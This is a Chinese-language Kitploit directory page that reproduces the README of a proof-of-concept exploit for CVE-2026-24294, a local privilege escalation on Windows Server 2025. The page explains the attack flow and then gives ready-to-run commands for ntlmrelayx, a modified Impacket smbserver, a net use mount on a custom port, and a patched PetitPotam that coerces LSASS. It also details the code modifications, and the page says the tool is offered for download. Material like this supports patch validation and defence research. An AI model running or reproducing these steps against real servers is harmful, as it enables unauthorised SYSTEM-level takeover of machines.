Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24294 — CVE-2026-24294 的本地权限提升 PoC,利用 SMB 任意端口和 NTLM 反射在 Windows Server 2025 上获取 SYSTEM 权限。 | Kitploit
工具/GitHubGitHub/0xndi/cve-2026-24294
权限提升漏洞分析漏洞利用横向移动渗透测试红队
GitHub0xndi/cve-2026-24294

CVE-2026-24294

CVE-2026-24294 的本地权限提升 PoC,利用 SMB 任意端口和 NTLM 反射在 Windows Server 2025 上获取 SYSTEM 权限。

查看仓库
5363个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24294 - 通过 SMB 任意端口实现本地 NTLM 反射提权

通过 NTLM 反射在 Windows Server 2025 上实现本地权限提升,利用 Windows 11 24H2 / Server 2025 中引入的 SMB 任意端口功能。

漏洞详情

Windows 11 24H2 / Server 2025 引入了一项 SMB 客户端功能,允许在任意 TCP 端口上建立连接(net use \\host\share /tcpport:PORT)。结合 SMB 会话多路复用(MS-SMB2 第 3.2.4.2 节),这实现了本地 NTLM 反射——低权限用户可强制特权服务(LSASS)向攻击者控制的非标准端口 SMB 服务器进行身份验证,然后将捕获的 NTLM 认证中继回 445 端口上的真实 SMB 服务。

影响:任何本地用户均可获得 NT AUTHORITY\SYSTEM 权限。

受影响版本:Windows Server 2025(默认配置)。Windows 11 24H2 强制启用 SMB 签名,从而阻止了中继攻击。

攻击流程

root@kitploit:~
 LSASS (SYSTEM) ──NTLM──► SMB 客户端 ──TCP:12345──► smbserver.py (我方)
                                                   │
                                                   ▼ 中继 NTLM 数据块
 SMB 服务 (:445) ◄────────────────── ntlmrelayx.py
 ← SYSTEM 会话
  1. net use 在自定义端口上建立到我们 SMB 服务器的 TCP 连接
  2. PetitPotam 强制 LSASS 向 \\127.0.0.1\share 进行身份验证
  3. SMB 客户端复用现有 TCP 连接(会话多路复用)
  4. 我们的 smbserver 捕获特权 NTLM 数据块并通过 ntlmrelayx 进行中继
  5. ntlmrelayx 以 SYSTEM 身份向 445 端口上的真实 SMB 服务进行身份验证

环境要求

  • Windows Server 2025 目标系统
  • 安装了 Impacket 的 Python 3
  • PetitPotam.exe(使用 Visual Studio 从源码构建,参见 PetitPotam/)

使用方法

打开 3 个终端。

终端 1 — 启动 ntlmrelayx(监听 RAW 端口 6666,中继到本地 SMB):

root@kitploit:~
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666

终端 2 — 启动修改版 smbserver(监听 12345 端口,将 NTLM 中继到 6666 端口):

root@kitploit:~
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666

终端 3 — 运行漏洞利用:

root@kitploit:~
:: 在自定义端口上挂载共享(建立持久 TCP 连接)
net use \\127.0.0.1\test /tcpport:12345 /user:user user

:: 强制 LSASS 向我们的 SMB 服务器进行身份验证
PetitPotam.exe 127.0.0.1 localhost 2

ntlmrelayx 输出的 whoami 结果将显示 NT AUTHORITY\SYSTEM。

组件说明

  • PetitPotam/ — 修改版 PetitPotam 源码。与上游相比有两处更改:
    • UUID:df1941c5-fe89-4e79-bf10-463657acf44d(WS2025 EFSRPC 接口)
    • 命名管道:\pipe\efsrpc
    • 使用 API #2(EfsRpcEncryptFileSrv),共享名称硬编码为 test
  • smbserver.py — 修改版 impacket smbserver,新增 -relay-port 标志。挂钩 SMB2 SESSION_SETUP,以捕获多路复用连接上的第二次 NTLM 认证,并将其中继到 RAW 中继服务器(ntlmrelayx --raw-port)。

致谢

此 PoC 大部分由 AI(GLM 5.1)基于以下研究和技术编写:

  • 绕过 Windows 认证反射缓解措施获取系统 Shell — Guillaume André,Synacktiv

参考资料

  • CVE-2026-24294 — 微软安全响应中心
  • PetitPotam — Gilles Lionel
  • Impacket — Fortra
下载工具